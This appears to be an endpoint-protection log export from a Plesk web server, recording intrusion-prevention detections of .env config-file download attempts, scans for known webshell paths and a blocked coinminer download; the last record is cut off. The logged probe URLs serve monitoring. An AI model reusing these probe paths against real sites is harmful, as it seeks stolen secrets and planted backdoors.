000003bb	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d3c13803	01dc9490d3c13803	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQzQzBENzEzLTk0OTAtMTFGMS1BQzJFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099da	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env.old			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bc	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d43d3279	01dc9490d43d3279	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ0M0M2RTQ4LTk0OTAtMTFGMS1BQzYyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099e4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env.prod			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bb	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d460f628	01dc9490d460f628	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ0NURDRjVFLTk0OTAtMTFGMS1BQzcwLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099e4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/crm/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000385	01dc9492bfdd1711	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc94929a143174	01dc94929a143174	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlBMTBGQkIzLTk0OTItMTFGMS1BQUJCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	00003bc4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/txets.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000390	01dc9492c3304302	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc94929db6ebbe	01dc94929db6ebbe	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlEQjYyNTg1LTk0OTItMTFGMS1BQzQyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	000090f8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/wp-content/txets.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000399	01dc9492c6883353	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc9492a1c8d3f3	01dc9492a1c8d3f3	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkExQzVBREIwLTk0OTItMTFGMS1BRkY2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000bfda	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/wp-includes/widgets/txets.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039a	01dc9492c9db72f7	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc9492a4621f3c	01dc9492a4621f3c	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE0NjIwQjAxLTk0OTItMTFGMS1BMTBFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000d2ba	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/wp-includes/rest-api/txets.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a6	01dc9492cd2e9fc9	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc9492a833a672	01dc9492a833a672	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4MzM5NTc2LTk0OTItMTFGMS1BMEE4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000900b	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/wp-includes/blocks/post-template/txets.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000038e	01dc9492d081c9a7	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc9492aa239204	01dc9492aa239204	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFBMjM2REM3LTk0OTItMTFGMS1BMzc4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	00009011	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/wp-admin/txets.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000391	01dc9492d081c9a7	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc9492ac40cbd9	01dc9492ac40cbd9	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFDNDBBNzlCLTk0OTItMTFGMS1BMjVCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000be4b	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/wp-includes/txets.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000038a	01dc9492d3d5a9f3	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc9492adb0aaf9	01dc9492adb0aaf9	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFEQUY5NURDLTk0OTItMTFGMS1BMkY1LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	000075ea	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/schallfuns.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000388	01dc9492d3d5a9f3	000000ce	0000000f	164a8367	73d61c68	00000002	00000002	00000001	01dc9492af9747fe	01dc9492af9747fe	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFGOTNGOEIyLTk0OTItMTFGMS1BNUMxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	000075eb	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://appviet.org/postnews.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b5	01dc94935227e958	000000ce	0000000f	164a8367	b2f25c5b	00000002	00000002	00000001	01dc94932e2cf4cf	01dc94932e2cf4cf	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjJFMkMyMDhFLTk0OTMtMTFGMS1BOEQ5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099a6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://luatanhnam.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000383	01dc94935227e958	000000ce	0000000f	164a8367	b2f25c5b	00000002	00000002	00000001	01dc94932e31b9a1	01dc94932e31b9a1	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjJFMkMyMDhELTk0OTMtMTFGMS1BOEQ5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	000099a6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://luatanhnam.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a7	01dc9493cd20d169	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc9493a849b266	01dc9493a849b266	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4NDdBNjQwLTk0OTMtMTFGMS1CQzEwLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000efbb	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.thinhphatvina.com.vn/ALFA_DATA/alfacgiapi/perl.alfa			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003ac	01dc9493cd20d169	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc9493a850a474	01dc9493a850a474	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4NDhGMzMxLTk0OTMtMTFGMS1CQzExLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000efc0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.thinhphatvina.com.vn/wp-content/themes/seotheme/db.php?u			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a4	01dc9493cd20d169	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc9493a8e16345	01dc9493a8e16345	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4RTA4RUZGLTk0OTMtMTFGMS1CQzUwLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000f19d	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.viking-vietnam.vn/ALFA_DATA/alfacgiapi/perl.alfa			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000386	01dc9493cd20d169	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc9493a8e62c5e	01dc9493a8e62c5e	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4RTJGMEYzLTk0OTMtMTFGMS1CQzUxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000f1a7	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.viking-vietnam.vn/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000389	01dc9493cd20d169	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc9493a8e88a69	01dc9493a8e88a69	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4RTU1ODE1LTk0OTMtMTFGMS1CQzUyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000efbe	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.thinhphatvina.com.vn/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a9	01dc9493cd20d169	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc9493a8eaecc5	01dc9493a8eaecc5	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4RTYwNUQ2LTk0OTMtMTFGMS1CQzUyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000f19c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.viking-vietnam.vn/wp-content/themes/seotheme/db.php?u			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039d	01dc9493cd20d169	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc9493a934d5fe	01dc9493a934d5fe	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE5MzE5RjM3LTk0OTMtMTFGMS1CQzcyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000efbb	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.thinhphatvina.com.vn/alfacgiapi/perl.alfa			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003be	01dc9494199ea889	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc9493f441edc9	01dc9493f441edc9	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY0NDExOTdDLTk0OTMtMTFGMS05REVFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000601e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://hieutt.internship.io.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc949430e13663	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc94942fcf0670	01dc9495956fc270	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 5:35:09 AM to 2/3/2026 5:45:09 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc949455687ca7	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94942fc31a8a	01dc94942fc31a8a	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjI3MzMyLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDcxNTI1ODczLCJ1aWQiOiIzQzQ1M0ZBMS0wMDdFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiIyRkMwMDcyMy05NDk0LTExRjEtODRFMi0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG1hMTUxM2UyMi0zMzFjLTQ0NDgtYjExZS00OGMxNmVlYWJiNTYgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnb